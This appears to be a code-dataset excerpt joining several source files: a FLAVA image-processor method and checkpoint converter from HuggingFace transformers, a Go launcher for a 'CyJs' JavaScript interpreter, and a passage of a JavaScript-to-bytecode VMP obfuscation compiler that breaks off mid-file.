Rescale factor to rescale the image by if `do_rescale` is set to `True`.
do_normalize (`bool`, *optional*, defaults to `self.do_normalize`):
Whether to normalize the image.
image_mean (`float` or `List[float]`, *optional*, defaults to `self.image_mean`):
Image mean.
image_std (`float` or `List[float]`, *optional*, defaults to `self.image_std`):
Image standard deviation.
return_image_mask (`bool`, *optional*, defaults to `self.return_image_mask`):
Whether to return the image mask.
input_size_patches (`int`, *optional*, defaults to `self.input_size_patches`):
Size of the patches to extract from the image.
total_mask_patches (`int`, *optional*, defaults to `self.total_mask_patches`):
Total number of patches to extract from the image.
mask_group_min_patches (`int`, *optional*, defaults to `self.mask_group_min_patches`):
Minimum number of patches to extract from the image.
mask_group_max_patches (`int`, *optional*, defaults to `self.mask_group_max_patches`):
Maximum number of patches to extract from the image.
mask_group_min_aspect_ratio (`float`, *optional*, defaults to `self.mask_group_min_aspect_ratio`):
Minimum aspect ratio of the patches to extract from the image.
mask_group_max_aspect_ratio (`float`, *optional*, defaults to `self.mask_group_max_aspect_ratio`):
Maximum aspect ratio of the patches to extract from the image.
return_codebook_pixels (`bool`, *optional*, defaults to `self.return_codebook_pixels`):
Whether to return the codebook pixels.
codebook_do_resize (`bool`, *optional*, defaults to `self.codebook_do_resize`):
Whether to resize the codebook pixels.
codebook_size (`Dict[str, int]`, *optional*, defaults to `self.codebook_size`):
Size of the codebook pixels.
codebook_resample (`int`, *optional*, defaults to `self.codebook_resample`):
Resampling filter to use if resizing the codebook pixels. This can be one of the enum
`PILImageResampling`, Only has an effect if `codebook_do_resize` is set to `True`.
codebook_do_center_crop (`bool`, *optional*, defaults to `self.codebook_do_center_crop`):
Whether to center crop the codebook pixels.
codebook_crop_size (`Dict[str, int]`, *optional*, defaults to `self.codebook_crop_size`):
Size of the center crop of the codebook pixels. Only has an effect if `codebook_do_center_crop` is set
to `True`.
codebook_do_rescale (`bool`, *optional*, defaults to `self.codebook_do_rescale`):
Whether to rescale the codebook pixels values between [0 - 1].
codebook_rescale_factor (`float`, *optional*, defaults to `self.codebook_rescale_factor`):
Rescale factor to rescale the codebook pixels by if `codebook_do_rescale` is set to `True`.
codebook_do_map_pixels (`bool`, *optional*, defaults to `self.codebook_do_map_pixels`):
Whether to map the codebook pixels values.
codebook_do_normalize (`bool`, *optional*, defaults to `self.codebook_do_normalize`):
Whether to normalize the codebook pixels.
codebook_image_mean (`float` or `List[float]`, *optional*, defaults to `self.codebook_image_mean`):
Codebook pixels mean to normalize the codebook pixels by if `codebook_do_normalize` is set to `True`.
codebook_image_std (`float` or `List[float]`, *optional*, defaults to `self.codebook_image_std`):
Codebook pixels standard deviation to normalize the codebook pixels by if `codebook_do_normalize` is
set to `True`.
return_tensors (`str` or `TensorType`, *optional*):
The type of tensors to return. Can be one of:
- Unset: Return a list of `np.ndarray`.
- `TensorType.TENSORFLOW` or `'tf'`: Return a batch of type `tf.Tensor`.
- `TensorType.PYTORCH` or `'pt'`: Return a batch of type `torch.Tensor`.
- `TensorType.NUMPY` or `'np'`: Return a batch of type `np.ndarray`.
- `TensorType.JAX` or `'jax'`: Return a batch of type `jax.numpy.ndarray`.
data_format (`ChannelDimension` or `str`, *optional*, defaults to `ChannelDimension.FIRST`):
The channel dimension format for the output image. Can be one of:
- `ChannelDimension.FIRST`: image in (num_channels, height, width) format.
- `ChannelDimension.LAST`: image in (height, width, num_channels) format.
"""
do_resize = do_resize if do_resize is not None else self.do_resize
size = size if size is not None else self.size
size = get_size_dict(size)
resample = resample if resample is not None else self.resample
do_center_crop = do_center_crop if do_center_crop is not None else self.do_center_crop
crop_size = crop_size if crop_size is not None else self.crop_size
crop_size = get_size_dict(crop_size, param_name="crop_size")
do_rescale = do_rescale if do_rescale is not None else self.do_rescale
rescale_factor = rescale_factor if rescale_factor is not None else self.rescale_factor
do_normalize = do_normalize if do_normalize is not None else self.do_normalize
image_mean = image_mean if image_mean is not None else self.image_mean
image_std = image_std if image_std is not None else self.image_std
return_image_mask = return_image_mask if return_image_mask is not None else self.return_image_mask
input_size_patches = input_size_patches if input_size_patches is not None else self.input_size_patches
total_mask_patches = total_mask_patches if total_mask_patches is not None else self.total_mask_patches
mask_group_min_patches = (
mask_group_min_patches if mask_group_min_patches is not None else self.mask_group_min_patches
)
mask_group_max_patches = (
mask_group_max_patches if mask_group_max_patches is not None else self.mask_group_max_patches
)
mask_group_min_aspect_ratio = (
mask_group_min_aspect_ratio
if mask_group_min_aspect_ratio is not None
else self.mask_group_min_aspect_ratio
)
mask_group_max_aspect_ratio = (
mask_group_max_aspect_ratio
if mask_group_max_aspect_ratio is not None
else self.mask_group_max_aspect_ratio
)
return_codebook_pixels = (
return_codebook_pixels if return_codebook_pixels is not None else self.return_codebook_pixels
)
codebook_do_resize = codebook_do_resize if codebook_do_resize is not None else self.codebook_do_resize
codebook_size = codebook_size if codebook_size is not None else self.codebook_size
codebook_size = get_size_dict(codebook_size, param_name="codebook_size")
codebook_resample = codebook_resample if codebook_resample is not None else self.codebook_resample
codebook_do_rescale = codebook_do_rescale if codebook_do_rescale is not None else self.codebook_do_rescale
codebook_rescale_factor = (
codebook_rescale_factor if codebook_rescale_factor is not None else self.codebook_rescale_factor
)
codebook_do_center_crop = (
codebook_do_center_crop if codebook_do_center_crop is not None else self.codebook_do_center_crop
)
codebook_crop_size = codebook_crop_size if codebook_crop_size is not None else self.codebook_crop_size
codebook_crop_size = get_size_dict(codebook_crop_size, param_name="codebook_crop_size")
codebook_do_map_pixels = (
codebook_do_map_pixels if codebook_do_map_pixels is not None else self.codebook_do_map_pixels
)
codebook_do_normalize = (
codebook_do_normalize if codebook_do_normalize is not None else self.codebook_do_normalize
)
codebook_image_mean = codebook_image_mean if codebook_image_mean is not None else self.codebook_image_mean
codebook_image_std = codebook_image_std if codebook_image_std is not None else self.codebook_image_std
images = make_list_of_images(images)
if not valid_images(images):
raise ValueError(
"Invalid image type. Must be of type PIL.Image.Image, numpy.ndarray, "
"torch.Tensor, tf.Tensor or jax.ndarray."
)
processed_images = [
self._preprocess_image(
image=img,
do_resize=do_resize,
size=size,
resample=resample,
do_center_crop=do_center_crop,
crop_size=crop_size,
do_rescale=do_rescale,
rescale_factor=rescale_factor,
do_normalize=do_normalize,
image_mean=image_mean,
image_std=image_std,
do_map_pixels=False,
data_format=data_format,
)
for img in images
]
data = {"pixel_values": processed_images}
if return_codebook_pixels:
codebook_images = [
self._preprocess_image(
image=img,
do_resize=codebook_do_resize,
size=codebook_size,
resample=codebook_resample,
do_center_crop=codebook_do_center_crop,
crop_size=codebook_crop_size,
do_rescale=codebook_do_rescale,
rescale_factor=codebook_rescale_factor,
do_normalize=codebook_do_normalize,
image_mean=codebook_image_mean,
image_std=codebook_image_std,
do_map_pixels=codebook_do_map_pixels,
data_format=data_format,
)
for img in images
]
data["codebook_pixel_values"] = codebook_images
if return_image_mask:
mask_generator = self.masking_generator(
input_size_patches=input_size_patches,
total_mask_patches=total_mask_patches,
mask_group_min_patches=mask_group_min_patches,
mask_group_max_patches=mask_group_max_patches,
mask_group_min_aspect_ratio=mask_group_min_aspect_ratio,
mask_group_max_aspect_ratio=mask_group_max_aspect_ratio,
)
masks = [mask_generator() for _ in images]
data["bool_masked_pos"] = masks
return BatchFeature(data=data, tensor_type=return_tensors)
|
2833844911/gojsvmp | 2,627 | main.go | package main
import (
"bufio"
"fmt"
"github.com/peterh/liner"
"golang.org/x/text/encoding/simplifiedchinese"
"golang.org/x/text/transform"
"io/ioutil"
"myvmp/ast"
"myvmp/evaluator"
"myvmp/lexer"
"myvmp/object"
"myvmp/parse"
"myvmp/promise"
"os"
"strings"
)
func getdt(code string, env *object.Environment) {
promise.CyJSInit()
dt := lexer.New(code)
kk := (*dt).Input()
fff := parse.NewParse(kk)
dtt := &ast.Program{Body: fff}
dtt.StatementNode()
evaluator.StartEval(dtt.Body, env)
promise.Done()
}
func cmd() {
line := liner.NewLiner()
defer line.Close()
fmt.Println("Welcome to the interactive CyJsShell. Type 'exit' or 'exit()' to quit.")
line.SetCtrlCAborts(true)
history := []string{}
env := object.NewEnv(nil)
for {
code, err := line.Prompt(">>>")
if err != nil {
fmt.Println("Error reading input:", err)
continue
}
history = append(history, code)
line.AppendHistory(code)
// 去掉输入字符串的换行符
code = code + ";"
if code == "exit;" {
break
} else if code == "exit();" {
break
}
// 捕获 getdt(code, env) 的异常
func() {
defer func() {
if r := recover(); r != nil {
fmt.Println("Recovered from panic:", r)
}
}()
getdt(code, env)
}()
}
f, err := os.Create(".liner_history")
if err != nil {
fmt.Println("Error creating history file:", err)
return
}
defer f.Close()
line.WriteHistory(f)
}
func doFile(code string) {
evaluator.Eval(code)
}
func main() {
if len(os.Args) < 2 {
fmt.Println("CyJs version 1.13\n")
cmd()
return
}
filePath := os.Args[1]
file, err := os.Open(filePath)
if err != nil {
fmt.Printf("Error opening file: %v\n", err)
return
}
defer file.Close()
reader := bufio.NewReader(file)
flineee, err := reader.ReadString('\n')
if err != nil {
fmt.Printf("Error reading first line: %v\n", err)
return
}
fline := strings.TrimSpace(flineee)
firstLine := strings.Replace(fline, " ", "", -1)
var content string
if firstLine == "//--utf-8--" {
data, err := ioutil.ReadAll(reader)
if err != nil {
fmt.Printf("Error reading file: %v\n", err)
return
}
content = string(data)
} else if firstLine == "//--gbk--" {
gbkReader := transform.NewReader(reader, simplifiedchinese.GBK.NewDecoder())
data, err := ioutil.ReadAll(gbkReader)
if err != nil {
fmt.Printf("Error reading file: %v\n", err)
return
}
content = string(data)
} else {
data, err := ioutil.ReadAll(reader)
if err != nil {
fmt.Printf("Error reading file: %v\n", err)
return
}
content = fline + "\n" + string(data)
}
content = strings.TrimSpace(content) + ";"
doFile(content)
}
|
27182812/ChatGLM-LLaMA-chinese-insturct | 4,372 | src/transformers/models/flava/convert_flava_original_pytorch_to_hf.py | # coding=utf-8
# Copyright 2022 Meta Platforms authors and The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import os
import torch
from transformers import FlavaConfig, FlavaForPreTraining
from transformers.models.flava.convert_dalle_to_flava_codebook import convert_dalle_checkpoint
def count_parameters(state_dict):
# encoder.embeddings are double copied in original FLAVA
return sum(param.float().sum() if "encoder.embeddings" not in key else 0 for key, param in state_dict.items())
def upgrade_state_dict(state_dict, codebook_state_dict):
upgrade = {}
for key, value in state_dict.items():
if "text_encoder.embeddings" in key or "image_encoder.embeddings" in key:
continue
key = key.replace("heads.cmd.mim_head.cls.predictions", "mmm_image_head")
key = key.replace("heads.cmd.mlm_head.cls.predictions", "mmm_text_head")
key = key.replace("heads.cmd.itm_head.cls", "itm_head")
key = key.replace("heads.cmd.itm_head.pooler", "itm_head.pooler")
key = key.replace("heads.cmd.clip_head.logit_scale", "flava.logit_scale")
key = key.replace("heads.fairseq_mlm.cls.predictions", "mlm_head")
key = key.replace("heads.imagenet.mim_head.cls.predictions", "mim_head")
key = key.replace("mm_text_projection", "flava.text_to_mm_projection")
key = key.replace("mm_image_projection", "flava.image_to_mm_projection")
key = key.replace("image_encoder.module", "flava.image_model")
key = key.replace("text_encoder.module", "flava.text_model")
key = key.replace("mm_encoder.module.encoder.cls_token", "flava.multimodal_model.cls_token")
key = key.replace("mm_encoder.module", "flava.multimodal_model")
key = key.replace("text_projection", "flava.text_projection")
key = key.replace("image_projection", "flava.image_projection")
upgrade[key] = value.float()
for key, value in codebook_state_dict.items():
upgrade[f"image_codebook.{key}"] = value
return upgrade
@torch.no_grad()
def convert_flava_checkpoint(checkpoint_path, codebook_path, pytorch_dump_folder_path, config_path=None):
"""
Copy/paste/tweak model's weights to transformers design.
"""
if config_path is not None:
config = FlavaConfig.from_pretrained(config_path)
else:
config = FlavaConfig()
hf_model = FlavaForPreTraining(config).eval()
codebook_state_dict = convert_dalle_checkpoint(codebook_path, None, save_checkpoint=False)
if os.path.exists(checkpoint_path):
state_dict = torch.load(checkpoint_path, map_location="cpu")
else:
state_dict = torch.hub.load_state_dict_from_url(checkpoint_path, map_location="cpu")
hf_state_dict = upgrade_state_dict(state_dict, codebook_state_dict)
hf_model.load_state_dict(hf_state_dict)
hf_state_dict = hf_model.state_dict()
hf_count = count_parameters(hf_state_dict)
state_dict_count = count_parameters(state_dict) + count_parameters(codebook_state_dict)
assert torch.allclose(hf_count, state_dict_count, atol=1e-3)
hf_model.save_pretrained(pytorch_dump_folder_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--pytorch_dump_folder_path", default=None, type=str, help="Path to the output PyTorch model.")
parser.add_argument("--checkpoint_path", default=None, type=str, help="Path to flava checkpoint")
parser.add_argument("--codebook_path", default=None, type=str, help="Path to flava codebook checkpoint")
parser.add_argument("--config_path", default=None, type=str, help="Path to hf config.json of model to convert")
args = parser.parse_args()
convert_flava_checkpoint(args.checkpoint_path, args.codebook_path, args.pytorch_dump_folder_path, args.config_path)
|
2833844911/cy_jsvmp | 28,166 | mainold.js | const parser = require("@babel/parser");
const generator = require("@babel/generator").default;
const fs = require("fs");
const {renameCj} = require("./tool/rename");
const process = require("child_process");
const {es6toes5} = require("./tool/es5toes6");
// 是否转es5
offes5 = 0
var dat = {"instanceof": 1811,"+":20, "<":24, "*":27, "%":28, "^":29, "/":30, "<<":31, "|":32, ">>":33, ">>>":34, "&":35, "-":19, "<=": 36, ">=":37,">":38,"==":39,"===":53,"!==":54,"!=":550,"in":551}
var datkey = Object.keys(dat)
for (let i = 0; i< datkey.length; i++){
datkey[i] = datkey[i]+"="
}
var fornum = 0
function cbbjsvmp(){
var dataText
if (offes5 === 1){
dataText = fs.readFileSync("./dist/"+soure) + '';
}else {
dataText = fs.readFileSync("./src/"+soure) + '';
}
dataText2 = fs.readFileSync("./tool/jsvmp_02.js") + '';
var changlc = {}
var constantPool = []
dataText = es6toes5(dataText)
var ast = parser.parse(dataText)
// 使用插件优化代码
// ast = renameCj(ast)
var numberKuai = 0
function copyArrayList(sour, newl){
for (let i = 0; i < newl.length; i++){
sour.push(newl[i])
}
}
function toPool(value){
var a1,a2
a1 = constantPool.indexOf(value)
if (a1 == -1){
a2 = constantPool.length
constantPool.push(value)
return a2
}else{
return a1
}
}
function startgetType(node, variablePool, zhili){
if (node == null){
return;
}
var a1,a2,a3,a4,a5;
switch(node.type){
case "EmptyStatement":
break
case "ConditionalExpression":
case "IfStatement":
startgetType(node.test, variablePool, zhili);
if (node.test.type === "AssignmentExpression"){
startgetType(node.test.left, variablePool, zhili);
}
zhili.push(192)
let ujj3 = []
startgetType(node.alternate, variablePool, ujj3)
zhili.push(ujj3.length + 2)
copyArrayList(zhili,ujj3)
zhili.push(190)
let ujj2 = []
startgetType(node.consequent, variablePool, ujj2)
zhili.push(ujj2.length)
copyArrayList(zhili,ujj2)
break
case "VariableDeclaration":
for (let i=0;i< node.declarations.length; i++){
startgetType(node.declarations[i], variablePool, zhili)
}
break
case "ForInStatement":
fornum += 1
let fbme = fornum
startgetType(node.right, variablePool,zhili)
zhili.push(57)
zhili.push(fbme)
zhili.push(10)
zhili.push(toPool( 0))
zhili.push(23)
zhili.push(22)
zhili.push(toPool("for_in_xh_cbb"+fbme))
let fggg = zhili.length
zhili.push(23)
zhili.push(10)
zhili.push(toPool("for_in_xh_cbb"+fbme))
zhili.push(181)
zhili.push(23)
zhili.push(10)
zhili.push(toPool("for_in_xh_cbb_list"+fbme))
zhili.push(181)
zhili.push(10)
zhili.push(toPool("length"))
zhili.push(181)
zhili.push(240)
zhili.push(25)
let dyyy = []
if (node.left.type === "VariableDeclaration"){
startgetType(node.left, variablePool,dyyy)
startgetType(node.left.declarations[0].id, variablePool,dyyy)
}else {
startgetType(node.left, variablePool,dyyy)
}
dyyy.pop()
dyyy.push(23)
dyyy.push(10)
dyyy.push(toPool( "for_in_xh_cbb_list"+fbme))
dyyy.push(181)
dyyy.push(23)
dyyy.push(10)
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(181)
dyyy.push(181)
dyyy.push(90)
startgetType(node.body,variablePool,dyyy)
dyyy.push(23)
dyyy.push(26)
dyyy.push(toPool("for_in_xh_cbb"+fbme))
dyyy.push(190)
dyyy.push(fggg - zhili.length -dyyy.length -2 )
let bbblenko = dyyy.length
for (let i =0; i< bbblenko; i++){
if (dyyy[i] == "cbb_break_in_the_this_yhh_417"){
dyyy[i] = 190;
dyyy[i+1] = bbblenko - i - 2
}else if (dyyy[i] == "cbb_continue_in_the_this_yhh_417"){
dyyy[i] = 190;
dyyy[i+1] = bbblenko - i - 7
}
}
zhili.push(dyyy.length)
copyArrayList(zhili, dyyy)
break
case "UpdateExpression":
startgetType(node.argument, variablePool, zhili)
if (node.operator =="++"){
// zhili.push(26)
zhili.pop()
zhili.push(10)
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(20)
zhili.push(90)
startgetType(node.argument, variablePool, zhili)
}else if (node.operator =="--"){
zhili.pop()
zhili.push(10)
zhili.push(toPool(1))
startgetType(node.argument, variablePool, zhili)
zhili.push(19)
zhili.push(90)
startgetType(node.argument, variablePool, zhili)
}
break
case "BreakStatement":
zhili.push("cbb_break_in_the_this_yhh_417")
zhili.push(undefined)
break
case "DebuggerStatement":
zhili.push(194)
break
case "ForStatement":
startgetType(node.init, variablePool,zhili)
let lenko = zhili.length
startgetType(node.test, variablePool,zhili)
if (node.test == null)
{
zhili.push(10)
zhili.push(toPool(true))
}
zhili.push(25)
let fgfgfdsujj = []
startgetType(node.body, variablePool, fgfgfdsujj)
startgetType(node.update, variablePool, fgfgfdsujj)
fgfgfdsujj.push(190)
fgfgfdsujj.push(lenko - zhili.length - fgfgfdsujj.length -2)
zhili.push(fgfgfdsujj.length)
lenko = fgfgfdsujj.length
for (let i =0; i< lenko; i++){
if (fgfgfdsujj[i] == "cbb_break_in_the_this_yhh_417"){
fgfgfdsujj[i] = 190;
fgfgfdsujj[i+1] = lenko - i - 2
}else if (fgfgfdsujj[i] == "cbb_continue_in_the_this_yhh_417"){
fgfgfdsujj[i] = 190;
fgfgfdsujj[i+1] = lenko - i - 4
}
}
copyArrayList(zhili, fgfgfdsujj)
break
case "WhileStatement":
let ffflenko = zhili.length
startgetType(node.test, variablePool,zhili)
zhili.push(25)
let jiiiujj = []
startgetType(node.body, variablePool, jiiiujj)
jiiiujj.push(190)
jiiiujj.push(ffflenko - zhili.length - jiiiujj.length -2)
zhili.push(jiiiujj.length)
ffflenko = jiiiujj.length
for (let i =0; i< ffflenko; i++){
if (jiiiujj[i] == "cbb_break_in_the_this_yhh_417"){
jiiiujj[i] = 190;
jiiiujj[i+1] = ffflenko - i - 2
}else if (jiiiujj[i] == "cbb_continue_in_the_this_yhh_417"){
jiiiujj[i] = 190;
jiiiujj[i+1] = ffflenko - i - 4
}
}
copyArrayList(zhili, jiiiujj)
break
case "DoWhileStatement":
let lenko2 = zhili.length
let ujj = []
startgetType(node.body, variablePool,ujj)
// ujj.push(190)
// ujj.push(lenko - zhili.length -ujj.length-2)
lenkoe = ujj.length
for (let i =0; i< lenkoe; i++){
if (ujj[i] == "cbb_break_in_the_this_yhh_417"){
ujj[i] = 190;
ujj[i+1] = lenkoe - i - 2
}else if (ujj[i] == "cbb_continue_in_the_this_yhh_417"){
ujj[i] = 190;
ujj[i+1] = lenkoe - i - 4
}
}
copyArrayList(zhili, ujj)
startgetType(node.test, variablePool,zhili)
zhili.push(192)
zhili.push(lenko2-zhili.length-1)
break
case "ContinueStatement":
zhili.push("cbb_continue_in_the_this_yhh_417")
zhili.push(undefined)
break
case "VariableDeclarator":
variablePool[node.id.name] = null;
if (node.init != null){
startgetType(node.init, variablePool, zhili)
if (node.init.type == "AssignmentExpression"){
startgetType(node.init.left, variablePool, zhili)
}
zhili.push(23)
zhili.push(22)
a1 = constantPool.indexOf(node.id.name)
if (a1 == -1){
zhili.push(constantPool.length)
constantPool.push(node.id.name)
}else{
zhili.push(a1)
}
}
break
case "SwitchStatement":
startgetType(node.discriminant, variablePool,zhili)
if (node.discriminant.type === "AssignmentExpression"){
startgetType(node.discriminant.left, variablePool,zhili)
}
let hu = node.cases.length
let zwdz = [];
let gggcbb = []
for (let i = 0;i < hu; i++){
let litshuz = []
if (node.cases[i].test == null){
zhili.push(10)
zhili.push(toPool( null))
}else{
startgetType(node.cases[i].test, variablePool, zhili)
}
zwdz.push(gggcbb.length)
// 块
for (let i2 = 0; i2 < node.cases[i].consequent.length; i2++){
startgetType(node.cases[i].consequent[i2], variablePool, litshuz)
}
copyArrayList(gggcbb, litshuz)
}
zhili.push(10)
zhili.push(toPool( null))
for (let i = 0;i < zwdz.length; i++){
zhili.push(10)
zhili.push(toPool(zwdz[i]))
}
zhili.push(10)
zhili.push(toPool(gggcbb.length))
zhili.push(48)
zhili.push(hu+1)
let oolenko = gggcbb.length
for (let i =0; i< oolenko; i++){
if (gggcbb[i] == "cbb_break_in_the_this_yhh_417"){
gggcbb[i] = 190;
gggcbb[i+1] = oolenko - i -2
}
}
copyArrayList(zhili, gggcbb)
break
case "LogicalExpression":
if (node.operator == "&&"){
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(51)
let bh = []
startgetType(node.right, variablePool, bh)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, bh)
}
zhili.push(bh.length)
copyArrayList(zhili, bh)
}else if (node.operator == "||"){
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(252)
let bh = []
startgetType(node.right, variablePool, bh)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, bh)
}
zhili.push(bh.length)
copyArrayList(zhili, bh)
}
break
case "BooleanLiteral":
case "NumericLiteral":
case "NullLiteral":
case "StringLiteral":
zhili.push(10)
a1 = constantPool.indexOf(node.value)
zhili.push(toPool(node.value))
break;
case "Identifier":
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.name))
zhili.push(181)
break
case "MemberExpression":
startgetType(node.object, variablePool, zhili)
if (node.object.type == "AssignmentExpression"){
startgetType(node.object.left, variablePool, zhili)
}
if (node.property.type == "Identifier" && node.computed == false){
zhili.push(10)
zhili.push(toPool(node.property.name))
zhili.push(181)
}else if (node.property.type == "NumericLiteral" || node.property.type == "StringLiteral"){
zhili.push(10)
zhili.push(toPool(node.property.value))
zhili.push(181)
}else{
startgetType(node.property, variablePool, zhili)
if (node.property.type == "AssignmentExpression"){
startgetType(node.property.left, variablePool, zhili)
}
zhili.push(181)
}
break
case "BinaryExpression":
startgetType(node.right, variablePool, zhili)
if (node.right.type == "AssignmentExpression"){
startgetType(node.right.left, variablePool, zhili)
}
startgetType(node.left, variablePool, zhili)
if (node.left.type == "AssignmentExpression"){
startgetType(node.left.left, variablePool, zhili)
}
zhili.push(dat[node.operator])
break
case "UnaryExpression":
if (node.argument.type == "NumericLiteral" || node.argument.type == "BooleanLiteral" || node.argument.type == "StringLiteral"){
zhili.push(10)
zhili.push(toPool( node.argument.value))
}else{
startgetType(node.argument, variablePool, zhili)
}
if (node.operator == "~"){
zhili.push(44)
}else if (node.operator == "typeof"){
zhili.push(49)
}else if (node.operator == "!"){
zhili.push(60)
}else if (node.operator == "-"){
zhili.push(50)
}else if (node.operator == "delete"){
zhili.pop()
zhili.push(55)
}else if (node.operator == "void"){
zhili.push(56)
}
break
case "CallExpression":
for (let i = 0; i < node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
if (node.arguments[i].type == "AssignmentExpression" && node.arguments[i].operator == "="){
startgetType(node.arguments[i].left, variablePool, zhili)
}
}
startgetType(node.callee, variablePool, zhili)
if (node.callee.type == "AssignmentExpression"){
startgetType(node.callee.left, variablePool, zhili)
}
zhili.push(150)
zhili.push(node.arguments.length)
break
case "FunctionDeclaration":
variablePool[node.id.name] = "awcbb_yhh_fun"+numberKuai
startfun(node)
break
case "ArrowFunctionExpression":
case "FunctionExpression":
let bcxh
if (node.id){
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[node.id.name] = bcxh
startfun(node)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(node.id.name))
zhili.push(181)
}else {
bcxh = "awcbb_yhh_fun"+numberKuai
variablePool[bcxh] = bcxh
startfun(node)
zhili.push(23)
zhili.push(10)
zhili.push(toPool(bcxh))
zhili.push(181)
}
break
case "SequenceExpression":
var d,ohh;
for (let i=0; i< node.expressions.length; i++){
startgetType(node.expressions[i], variablePool, zhili)
if (node.expressions[i].type === "CallExpression" || node.expressions[i].type === "Identifier" || node.expressions[i].type === "MemberExpression"
|| node.expressions[i].type === "BooleanLiteral"|| node.expressions[i].type === "NumericLiteral"
|| node.expressions[i].type === "NullLiteral"|| node.expressions[i].type === "StringLiteral"
|| node.expressions[i].type === "FunctionExpression"
|| node.expressions[i].type === "UnaryExpression"
|| node.expressions[i].type === "BinaryExpression"
|| node.expressions[i].type === "UpdateExpression"
|| node.expressions[i].type === "SequenceExpression"
|| node.expressions[i].type === "LogicalExpression"
|| node.expressions[i].type === "ConditionalExpression"
|| true
){
d = zhili.push(1810)
ohh = 1
}else {
ohh =0
}
}
if (ohh === 1){
zhili.pop()
}else {
zhili.push(10)
zhili.push(toPool(undefined))
}
break
case "ObjectExpression":
zhili.push(104)
for (let i=0; i< node.properties.length; i++){
startgetType(node.properties[i], variablePool, zhili)
}
break
case "ThrowStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(58)
break
case "ObjectProperty":
if (node.key.type == "Identifier"){
zhili.push(10)
zhili.push(toPool(node.key.name))
}else{
startgetType(node.key, variablePool,zhili)
}
startgetType(node.value, variablePool,zhili)
zhili.push(45)
break
case "ArrayExpression":
zhili.push(105)
for (let i=0; i< node.elements.length; i++){
startgetType(node.elements[i], variablePool, zhili)
zhili.push(40)
}
break;
case "RegExpLiteral":
zhili.push(8)
zhili.push(toPool( node.pattern))
zhili.push(toPool( node.flags))
break
case "TryStatement":
zhili.push(195)
let bcnxbc = []
startgetType(node.block, variablePool, bcnxbc)
bcnxbc.push(200)
zhili.push(bcnxbc.length)
if (node.handler != null){
variablePool[node.handler.param.name] = null
startgetType(node.handler.param, variablePool, bcnxbc)
bcnxbc.pop()
bcnxbc.push(197)
startgetType(node.handler.body, variablePool, bcnxbc)
}
bcnxbc.push(200)
zhili.push(bcnxbc.length - zhili[zhili.length-1])
if (node.finalizer != null){
startgetType(node.finalizer, variablePool, bcnxbc)
}
bcnxbc.push(200)
zhili.push(bcnxbc.length - zhili[zhili.length-1]- zhili[zhili.length-2])
copyArrayList(zhili, bcnxbc)
break
case "AssignmentPattern":
case "AssignmentExpression":
if (node.operator == '+='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.right, variablePool, zhili)
startgetType(node.left, variablePool, zhili)
zhili.push(20)
zhili.push(90)
}else if (node.operator == '-='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(291)
zhili.push(90)
}else if (node.operator == '|='){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(32)
zhili.push(90)
}else if(datkey.indexOf(node.operator) != -1){
startgetType(node.left, variablePool, zhili)
zhili.pop()
startgetType(node.left, variablePool, zhili)
startgetType(node.right, variablePool, zhili)
zhili.push(dat[node.operator.replace("=","")])
zhili.push(90)
}
else{
startgetType(node.left, variablePool, zhili)
zhili.pop()
if (node.right.type == "AssignmentExpression"){
startgetType(node.right, variablePool, zhili)
startgetType(node.right.left, variablePool, zhili)
}else{
startgetType(node.right, variablePool, zhili)
}
zhili.push(290)
}
break;
case "ExpressionStatement":
startgetType(node.expression, variablePool, zhili)
break
case "BlockStatement":
for (a1= 0; a1< node.body.length; a1++){
startgetType(node.body[a1], variablePool, zhili)
}
break
case "ThisExpression":
zhili.push(47)
break
case "NewExpression":
let callargsNum = node.arguments.length;
for (let i =0; i< node.arguments.length; i++){
startgetType(node.arguments[i], variablePool, zhili)
}
startgetType(node.callee, variablePool,zhili)
zhili.push(46)
zhili.push(callargsNum)
break
case "ReturnStatement":
startgetType(node.argument, variablePool, zhili)
zhili.push(-1)
break
default:
console.log(generator(node).code)
console.log("is not jiex");
}
}
function startfun(node2){
let name = "awcbb_yhh_fun"+numberKuai
numberKuai += 1
changlc[name] = {"variablePool":{}
, "zhili": []}
for (let i =0; i< node2.params.length; i++){
if (node2.params[i].type === "AssignmentPattern"){
changlc[name]['variablePool'][node2.params[i].left.name] = null
startgetType(node2.params[i], changlc[name]['variablePool'], changlc[name]['zhili'])
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].left.name))
}else {
changlc[name]['variablePool'][node2.params[i].name] = null
changlc[name]['zhili'].push(10)
changlc[name]['zhili'].push(toPool(node2.params[i].name))
}
}
changlc[name]['zhili'].push(2)
startgetType(node2.body, changlc[name]['variablePool'], changlc[name]['zhili'])
let hb = []
for (let i in changlc[name]['variablePool']){
if (changlc[name]['variablePool'][i] && changlc[name]['variablePool'][i].indexOf("awcbb_yhh_fun") != -1){
hb.push(10)
hb.push(toPool(i))
}
}
hb.push(1)
let f = hb.length
for (let i =0;i< f; i++){
changlc[name]['zhili'].splice(0,0,hb.pop())
}
}
function start(node2){
